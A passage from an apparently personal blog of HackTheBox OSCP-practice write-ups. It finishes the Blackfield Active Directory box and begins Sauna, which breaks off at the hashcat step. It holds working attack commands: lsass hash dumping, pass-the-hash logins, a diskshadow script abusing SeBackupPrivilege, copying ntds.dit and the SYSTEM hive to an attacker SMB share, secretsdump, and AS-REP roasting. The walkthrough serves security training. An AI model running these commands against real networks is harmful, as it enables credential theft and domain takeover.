<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec winrm 10.10.10.192 -u audit2020 -p 'Password@!!' </span><br><span class="line">SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)</span><br><span class="line">HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman</span><br><span class="line">WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\audit2020:Password@!!</span><br></pre></td></tr></table></figure>
<h2 id="0x05-audit2020-gt-svc-backup"><a href="#0x05-audit2020-gt-svc-backup" class="headerlink" title="0x05 audit2020->svc_backup"></a>0x05 audit2020->svc_backup</h2><h3 id="Enumration"><a href="#Enumration" class="headerlink" title="Enumeration"></a>Enumeration</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ smbmap -H 10.10.10.192 -u audit2020 -p 'Password@!!' </span><br><span class="line">[+] IP: 10.10.10.192:445 Name: 10.10.10.192 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> ADMIN$ NO ACCESS Remote Admin</span><br><span class="line"> C$ NO ACCESS Default share</span><br><span class="line"> forensic READ ONLY Forensic / Audit share.</span><br><span class="line"> IPC$ READ ONLY Remote IPC</span><br><span class="line"> NETLOGON READ ONLY Logon server share </span><br><span class="line"> profiles$ READ ONLY</span><br><span class="line"> SYSVOL READ ONLY Logon server share</span><br></pre></td></tr></table></figure>
<p>然后发现<code>forensic</code>共享文件夹中有内存转储信息,其中<code>lsass</code>的内存转储对我们进行进一步的横向移动有很大帮助。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">$ smbclient -U 'audit2020%Password@!!' \\\\10.10.10.192\\forensic</span><br><span class="line">Try "help" to get a list of possible commands.</span><br><span class="line">smb: \> ls</span><br><span class="line"> . D 0 Sun Feb 23 21:03:16 2020</span><br><span class="line"> .. D 0 Sun Feb 23 21:03:16 2020</span><br><span class="line"> commands_output D 0 Mon Feb 24 02:14:37 2020</span><br><span class="line"> memory_analysis D 0 Fri May 29 04:28:33 2020</span><br><span class="line"> tools D 0 Sun Feb 23 21:39:08 2020</span><br><span class="line"></span><br><span class="line"> 5102079 blocks of size 4096. 1599037 blocks available</span><br><span class="line">smb: \> cd memory_analysis</span><br><span class="line">smb: \memory_analysis\> ls</span><br><span class="line"> . D 0 Fri May 29 04:28:33 2020</span><br><span class="line"> .. 
D 0 Fri May 29 04:28:33 2020</span><br><span class="line"> conhost.zip A 37876530 Fri May 29 04:25:36 2020</span><br><span class="line"> ctfmon.zip A 24962333 Fri May 29 04:25:45 2020</span><br><span class="line"> dfsrs.zip A 23993305 Fri May 29 04:25:54 2020</span><br><span class="line"> dllhost.zip A 18366396 Fri May 29 04:26:04 2020</span><br><span class="line"> ismserv.zip A 8810157 Fri May 29 04:26:13 2020</span><br><span class="line"> lsass.zip A 41936098 Fri May 29 04:25:08 2020</span><br><span class="line"> mmc.zip A 64288607 Fri May 29 04:25:25 2020</span><br><span class="line"> RuntimeBroker.zip A 13332174 Fri May 29 04:26:24 2020</span><br><span class="line"> ServerManager.zip A 131983313 Fri May 29 04:26:49 2020</span><br><span class="line"> sihost.zip A 33141744 Fri May 29 04:27:00 2020</span><br><span class="line"> smartscreen.zip A 33756344 Fri May 29 04:27:11 2020</span><br><span class="line"> svchost.zip A 14408833 Fri May 29 04:27:19 2020</span><br><span class="line"> taskhostw.zip A 34631412 Fri May 29 04:27:30 2020</span><br><span class="line"> winlogon.zip A 14255089 Fri May 29 04:27:38 2020</span><br><span class="line"> wlms.zip A 4067425 Fri May 29 04:27:44 2020</span><br><span class="line"> WmiPrvSE.zip A 18303252 Fri May 29 04:27:53 2020</span><br></pre></td></tr></table></figure>
<h3 id="Extract-Hashes"><a href="#Extract-Hashes" class="headerlink" title="Extract Hashes"></a>Extract Hashes</h3><p>解压<code>lsass.zip</code>后得到一个<code>lsass.DMP</code>文件,然后利用<code>pypykatz</code>工具从中转储哈希。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">$ pypykatz lsa minidump lsass.DMP > ../../lsadump </span><br><span class="line"></span><br><span class="line">$ cat lsadump |grep username|sort -u</span><br><span class="line">username </span><br><span class="line"> username Administrator</span><br><span class="line">username Administrator</span><br><span class="line"> username DC01$</span><br><span class="line">username DC01$</span><br><span class="line">username DWM-1</span><br><span class="line">username DWM-2</span><br><span class="line">username LOCAL SERVICE</span><br><span class="line"> username svc_backup</span><br><span class="line">username svc_backup</span><br><span class="line">username UMFD-0</span><br><span class="line">username UMFD-1</span><br><span class="line">username UMFD-2</span><br></pre></td></tr></table></figure>
<p>简要分析转储内容后,发现其中包含几个账户的凭据信息,比如<code>svc_backup</code>、<code>Administrator</code>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ cat lsadump |grep svc_backup -C 5 </span><br><span class="line">FILE: ======== lsass.DMP ======= </span><br><span class="line">== LogonSession == </span><br><span class="line">authentication_id 406458 (633ba) </span><br><span class="line">session_id 2 </span><br><span class="line">username svc_backup </span><br><span class="line">domainname BLACKFIELD </span><br><span class="line">logon_server DC01 </span><br><span class="line">logon_time 2020-02-23T18:00:03.423728+00:00 </span><br><span class="line">sid S-1-5-21-4194615774-2175524697-3563712290-1413 </span><br><span class="line">luid 406458 </span><br><span class="line"> == MSV == </span><br><span class="line"> Username: svc_backup </span><br><span class="line"> Domain: BLACKFIELD </span><br><span class="line"> LM: NA </span><br><span class="line"> NT: 9658d1d1dcd9250115e2205d9f48400d </span><br><span class="line"> SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c </span><br><span class="line"> DPAPI: a03cd8e9d30171f3cfe8caad92fef621 </span><br></pre></td></tr></table></figure>
<p>获得了svc_backup账号的hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">svc_backup:9658d1d1dcd9250115e2205d9f48400d</span><br></pre></td></tr></table></figure>
<p>验证凭证,发现可以用winrm登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec winrm 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'</span><br><span class="line">SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)</span><br><span class="line">HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman</span><br><span class="line">WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)</span><br></pre></td></tr></table></figure>
<p>使用<code>evil-winrm</code>登录主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ evil-winrm -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'</span><br></pre></td></tr></table></figure>
<p>flag在用户Desktop上</p>
<img src="/undefined/3db8feaa/userflag.png" class="">
<h2 id="0x06-svc-backup-gt-Administrator"><a href="#0x06-svc-backup-gt-Administrator" class="headerlink" title="0x06 svc_backup -> Administrator"></a>0x06 svc_backup -> Administrator</h2><h3 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h3><p>发现账户存在<code>SeBackupPrivilege</code>权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv</span><br><span class="line"></span><br><span class="line">PRIVILEGES INFORMATION</span><br><span class="line">----------------------</span><br><span class="line"></span><br><span class="line">Privilege Name Description State</span><br><span class="line">============================= ============================== =======</span><br><span class="line">SeMachineAccountPrivilege Add workstations to domain Enabled</span><br><span class="line">SeBackupPrivilege Back up files and directories Enabled</span><br><span class="line">SeRestorePrivilege Restore files and directories Enabled</span><br><span class="line">SeShutdownPrivilege Shut down the system Enabled</span><br><span class="line">SeChangeNotifyPrivilege Bypass traverse checking Enabled</span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a process working set Enabled</span><br></pre></td></tr></table></figure>
<p>这意味着我们可以利用这一权限,将一些本来没有权限读取的文件备份到一个可写目录下,从而越权读取这些文件。</p>
<p>先上传一些工具</p>
<img src="/undefined/3db8feaa/image-20230509232448021.png" class="">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> import-module .\SeBackupPrivilegeCmdLets.dll</span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> import-module .\SeBackupPrivilegeUtils.dll</span><br></pre></td></tr></table></figure>
<p>接着我们便可以尝试直接复制root.txt,但是很可惜,我们并不能复制该文件,同样也不能复制<code>ntds.dit</code>文件,因为后者正被另一个进程所使用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege \users\administrator\desktop\root.txt so1.txt</span><br><span class="line">Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))</span><br><span class="line">At line:1 char:1</span><br><span class="line">+ Copy-FileSeBackupPrivilege \users\administrator\desktop\root.txt 0xdf ...</span><br><span class="line">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span><br><span class="line"> + CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception</span><br><span class="line"> + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .</span><br><span class="line">Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)</span><br><span class="line">At line:1 char:1</span><br><span class="line">+ Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .</span><br><span class="line">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span><br><span class="line"> + CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception</span><br><span class="line"> + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege</span><br></pre></td></tr></table></figure>
<h3 id="Diskshadow"><a href="#Diskshadow" class="headerlink" title="Diskshadow"></a>Diskshadow</h3><blockquote>
<p>Diskshadow.exe 是一种公开卷影复制服务 (VSS) 提供的功能的工具。 默认情况下,Diskshadow 使用类似于 Diskraid 或 Diskpart 的交互式命令解释器。 Diskshadow 还包括一个脚本模式。 </p>
</blockquote>
<p>此时我们可以利用diskshadow为C盘创建卷影副本并将其暴露为另一个驱动器,这样我们就可以从副本中复制原本被占用的文件,达到提权的效果。</p>
<p>两个脚本内容如下</p>
<p>diskshadow.txt</p>
<blockquote>
<p>需要注意的是set metadata可以用于指定<code> .cab</code>文件的存储路径,我们需要使其存储在可写目录下,否则无法成功挂载到另一个驱动器上</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">set context persistent nowriters</span><br><span class="line">add volume c: alias someAlias</span><br><span class="line">set metadata c:\programdata\sol.cab</span><br><span class="line">set verbose on</span><br><span class="line">create</span><br><span class="line">expose %someAlias% z:</span><br><span class="line">reset</span><br></pre></td></tr></table></figure>
<p>delete.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">delete shadows volume z</span><br><span class="line">reset</span><br></pre></td></tr></table></figure>
<p>由于脚本要在Windows上运行,需要先将文件的换行符转换为Windows(CRLF)格式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ unix2dos diskshadow.txt</span><br><span class="line">$ unix2dos delete.txt</span><br></pre></td></tr></table></figure>
<p>然后上传到目标主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> upload /home/sollupus/OSCP/Blackfield/exploit/diskshadow.txt</span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> upload /home/sollupus/OSCP/Blackfield/exploit/delete.txt</span><br></pre></td></tr></table></figure>
<p>然后运行脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> diskshadow /s .\diskshadow.txt</span><br></pre></td></tr></table></figure>
<img src="/undefined/3db8feaa/image-20230509233656418.png" class="">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> diskshadow /s .\diskshadow.txt</span><br></pre></td></tr></table></figure>
<img src="/undefined/3db8feaa/image-20230509233605284.png" class="">
<p>这样一来,我们就可以获取C盘下的所有内容了</p>
<h3 id="Grab-ntds-dit"><a href="#Grab-ntds-dit" class="headerlink" title="Grab ntds.dit"></a>Grab ntds.dit</h3><p>先在本地开启smbserver,然后直接将ntds.dit文件传输到本地主机上</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> copy-filesebackupprivilege z:\windows\ntds\ntds.dit .</span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> mv .\ntds.dit \\10.10.16.x\share\ntds.dit</span><br></pre></td></tr></table></figure>
<p>然后再将SYSTEM内容传输过来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> reg save hklm\system</span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> mv SYSTEM \\10.10.16.x\share\SYSTEM</span><br></pre></td></tr></table></figure>
<h3 id="Dump-hashes"><a href="#Dump-hashes" class="headerlink" title="Dump hashes"></a>Dump hashes</h3><p>使用secretsdump工具转储hash,成功获取Administrator的hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -o secretsdump</span><br><span class="line">$ cat secretsdump.ntds|grep -i administrator</span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::</span><br></pre></td></tr></table></figure>
<p>然后我们就可以利用各种工具登录目标机器</p>
<img src="/undefined/3db8feaa/image-20230509234412462.png" class="">
<p>root.txt</p>
<img src="/undefined/3db8feaa/rootflag.png" class="">
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/55527558.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/55527558.html" class="post-title-link" itemprop="url">Road-to-OSCP-6-Sauna</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2023-05-07 22:08:55" itemprop="dateCreated datePublished" datetime="2023-05-07T22:08:55+08:00">2023-05-07</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2024-09-28 20:29:19" itemprop="dateModified" datetime="2024-09-28T20:29:19+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<h1 id="Sauna"><a href="#Sauna" class="headerlink" title="Sauna"></a>Sauna</h1><h2 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"># Nmap 7.93 scan initiated Fri May 5 15:30:30 2023 as: nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -oN nmapTcp 10.10.10.175</span><br><span class="line">Nmap scan report for 10.10.10.175</span><br><span class="line">Host is up (0.32s latency).</span><br><span class="line"></span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">53/tcp open domain Simple DNS 
Plus</span><br><span class="line">80/tcp open http Microsoft IIS httpd 10.0</span><br><span class="line">| http-methods: </span><br><span class="line">|_ Potentially risky methods: TRACE</span><br><span class="line">|_http-server-header: Microsoft-IIS/10.0</span><br><span class="line">|_http-title: Egotistical Bank :: Home</span><br><span class="line">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-05 14:30:47Z)</span><br><span class="line">135/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">139/tcp open netbios-ssn Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)</span><br><span class="line">445/tcp open microsoft-ds?</span><br><span class="line">464/tcp open kpasswd5?</span><br><span class="line">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp open tcpwrapped</span><br><span class="line">3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)</span><br><span class="line">3269/tcp open tcpwrapped</span><br><span class="line">5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">9389/tcp open mc-nmf .NET Message Framing</span><br><span class="line">Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_clock-skew: 7h00m00s</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">| 311: </span><br><span class="line">|_ Message signing enabled and required</span><br><span class="line">| smb2-time: </span><br><span class="line">| date: 2023-05-05T14:31:08</span><br><span 
class="line">|_ start_date: N/A</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line"># Nmap done at Fri May 5 15:31:49 2023 -- 1 IP address (1 host up) scanned in 79.48 seconds</span><br></pre></td></tr></table></figure>
<h3 id="ldap-389"><a href="#ldap-389" class="headerlink" title="ldap - 389"></a>ldap - 389</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ldapsearch -H ldap://10.10.10.175 -x -s base namingcontext</span><br><span class="line"> </span><br><span class="line">namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">ldapsearch -x -h 10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'</span><br><span class="line"></span><br><span class="line">dn: DC=EGOTISTICAL-BANK,DC=LOCAL </span><br><span class="line">objectClass: top</span><br><span class="line">objectClass: domain</span><br><span class="line">objectClass: domainDNS</span><br><span class="line">distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">instanceType: 5</span><br><span class="line">whenCreated: 20200123054425.0Z</span><br><span class="line">whenChanged: 20200216124516.0Z</span><br><span class="line">subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">...[snip]...</span><br></pre></td></tr></table></figure>
<h3 id="website-80"><a href="#website-80" class="headerlink" title="website -80"></a>website -80</h3><p>Found some team members’ names on the site.</p>
<img src="/undefined/55527558/image-20230507213825194.png" class="">
<h3 id="kerberos-88"><a href="#kerberos-88" class="headerlink" title="kerberos -88"></a>kerberos -88</h3><p>Use kerbrute’s userenum mode to obtain a list of valid usernames.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175</span><br><span class="line"> __ __ __ </span><br><span class="line"> / /_____ _____/ /_ _______ __/ /____ </span><br><span class="line"> / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \</span><br><span class="line"> / ,< / __/ / / /_/ / / / /_/ / /_/ __/</span><br><span class="line">/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ </span><br><span class="line"></span><br><span class="line">Version: dev (n/a) - 02/15/20 - Ronnie Flathers @ropnop</span><br><span class="line"></span><br><span class="line">2020/02/15 14:41:50 > Using KDC(s):</span><br><span class="line">2020/02/15 14:41:50 > 10.10.10.175:88</span><br><span class="line"></span><br><span class="line">2020/02/15 14:41:59 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 14:42:46 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 14:42:54 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 14:43:21 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 14:47:43 > [+] VALID USERNAME: [email protected]</span><br><span 
class="line">2020/02/15 16:01:56 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/16 03:13:54 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/16 03:13:54 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/16 03:24:34 > Done! Tested 8295455 usernames (8 valid) in 17038.364 seconds</span><br></pre></td></tr></table></figure>
<h2 id="Shell-as-fsmith"><a href="#Shell-as-fsmith" class="headerlink" title="Shell as fsmith"></a>Shell as fsmith</h2><h3 id="AS-REP-Roasting"><a href="#AS-REP-Roasting" class="headerlink" title="AS-REP Roasting"></a>AS-REP Roasting</h3><p>Request the AS-REP for each enumerated user; a crackable hash is only returned for accounts that have Kerberos pre-authentication disabled.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">impacket-GetNPUsers 'EGOTISTICAL-BANK.LOCAL/' -userfile users.txt -format hashcat -outputfile hash -dc-ip 10.10.10.175</span><br><span class="line"></span><br><span class="line">[email protected]:6917e50f638536dc4a8acec7903dc045$2b03faaa6ed126e97cbc936ab835e16b6a2c185bded1e4f679985c6adcb993ad7b843a05e6fe0ccaa35a9f8d196d161d3b0335a6eaf21e1c4d943d4ad0fba1dcc07283c3172b6eb2ca0f2123f0efb81a517b1a8ca2b6973fd073dff3b67a02961060f232c99e1985aeb80c6d0c7a803cf84c6c8122610c3297f1decc329601aaeec33c92a25c32574d1537e11c09fbdc2c1169d381bdf2864f3a6ff27b457d41df8c0b1b010d5a1b5a2bbf1bd08f3a0259aa5a79ca27a408bf40497c37ecd733425d907c0ad4fc87fbdef0c417718adfe0377123821694223dc850bb23e67edc9afd8254822d24b8f0220c20dd7d0f327937439a1b9284a596c15d49fd9adc97</span><br></pre></td></tr></table></figure>
<p>Crack the hash offline with hashcat (mode 18200 = Kerberos 5 AS-REP):</p>
